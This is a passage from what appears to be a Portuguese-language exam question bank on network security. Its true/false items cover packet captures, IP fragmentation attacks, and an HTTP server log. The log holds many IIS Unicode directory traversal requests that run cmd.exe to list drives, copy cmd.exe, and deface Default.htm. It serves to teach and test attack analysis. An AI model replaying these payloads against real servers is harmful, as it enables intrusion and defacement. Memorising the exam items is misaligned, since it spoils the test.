Foram encontradas 250 questões.
A realização de análise de tráfego em uma rede TCP/IP é uma técnica importante para monitoração e auditoria da rede e de seus serviços. As figuras I e II a seguir, obtidas com o uso da ferramenta Ethereal (www.ethereal.com), apresentam exemplos típicos de informações extraídas com o uso de ferramentas analisadoras de rede, que são empregadas na realização de análise de tráfego.
Acerca das informações contidas nas figuras I e II e de suas interpretações, julgue os itens a seguir, relativos à rede mencionada acima.
Os pacotes de números 41, 42, 45 e 46, mostrados na figura II, fazem parte de uma mesma conexão TCP no sentido da porta 1024 para a porta ftp. Por outro lado, os pacotes 43 e 44 fazem parte de outra conexão TCP simétrica, no sentido da porta ftp para a porta 1024. As duas conexões formam uma ligação TCP bidirecional.
Provas
A realização de análise de tráfego em uma rede TCP/IP é uma técnica importante para monitoração e auditoria da rede e de seus serviços. As figuras I e II a seguir, obtidas com o uso da ferramenta Ethereal (www.ethereal.com), apresentam exemplos típicos de informações extraídas com o uso de ferramentas analisadoras de rede, que são empregadas na realização de análise de tráfego.
Acerca das informações contidas nas figuras I e II e de suas interpretações, julgue os itens a seguir, relativos à rede mencionada acima.
O pacote de número 42, na figura II, é uma retransmissão do pacote de número 41.
Provas
A realização de análise de tráfego em uma rede TCP/IP é uma técnica importante para monitoração e auditoria da rede e de seus serviços. As figuras I e II a seguir, obtidas com o uso da ferramenta Ethereal (www.ethereal.com), apresentam exemplos típicos de informações extraídas com o uso de ferramentas analisadoras de rede, que são empregadas na realização de análise de tráfego.
Acerca das informações contidas nas figuras I e II e de suas interpretações, julgue os itens a seguir, relativos à rede mencionada acima.
De acordo com a figura I, o protocolo UDP não está implementado nessa rede, sendo o protocolo TCP o único protocolo de transporte disponível.
Provas
A realização de análise de tráfego em uma rede TCP/IP é uma técnica importante para monitoração e auditoria da rede e de seus serviços. As figuras I e II a seguir, obtidas com o uso da ferramenta Ethereal (www.ethereal.com), apresentam exemplos típicos de informações extraídas com o uso de ferramentas analisadoras de rede, que são empregadas na realização de análise de tráfego.
Acerca das informações contidas nas figuras I e II e de suas interpretações, julgue os itens a seguir, relativos à rede mencionada acima.
Todo o tráfego observado, de acordo com a figura I, utiliza o protocolo IP.
Provas
Considere os seguintes trechos de tráfego.
Julgue os itens a seguir, relativos a esses trechos de tráfego.
Os trechos acima utilizam a fragmentação de maneira maliciosa.
Provas
Considere os seguintes trechos de tráfego.
Julgue os itens a seguir, relativos a esses trechos de tráfego.
O trecho III tem o mesmo efeito no sistema que o trecho II, só que de forma mais rápida.
Provas
Considere os seguintes trechos de tráfego.
Julgue os itens a seguir, relativos a esses trechos de tráfego.
O trecho III mostra a fragmentação sobre os cabeçalhos TCP, de maneira idêntica à dissimulação de port scans usando o flag FIN.
Provas
Considere os seguintes trechos de tráfego.
Julgue os itens a seguir, relativos a esses trechos de tráfego.
O trecho II poderia indicar um ataque de exaustão de recursos do sistema, causando lentidão no processamento.
Provas
Considere os seguintes trechos de tráfego.
Julgue os itens a seguir, relativos a esses trechos de tráfego.
O trecho I apresenta tráfego legítimo, mas que pode causar crashes e travamentos em alguns sistemas operacionais com implementações deficientes da pilha TCP/IP.
Provas
Texto CE – questões de 36 a 38
Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.
atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET
/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 306
atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c
0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgibin/..%
c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461
atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461
atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 607
atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:d:\ HTTP/1.0" 502 283
atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+d:\ HTTP/1.0" 200 342
atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+e:\ HTTP/1.0" 200 543
atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 200 607
atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub HTTP/1.1" 200 493
atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot HTTP/1.1" 200 828
atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\s3.exe
HTTP/1.0" 502 259
atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\cmd.exe
HTTP/1.0" 502 259
atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\s3.exe
HTTP/1.0" 502 242
atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1
th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87
atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1
th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87
atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1t
h+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 404 461
atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215
atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215
atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215
atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880
atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215
Ainda com base no texto CE, julgue os itens subseqüentes, relativos ao servidor http e aos ataques ocorridos.
Um dos elementos dos ataques está no fato de o diretório "system32" ter seu acesso liberado, na configuração default do sistema operacional.
Provas
Caderno Container